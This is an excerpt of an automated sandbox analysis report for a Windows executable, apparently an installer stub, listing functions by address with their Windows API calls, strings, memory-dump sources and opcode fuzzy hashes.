                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9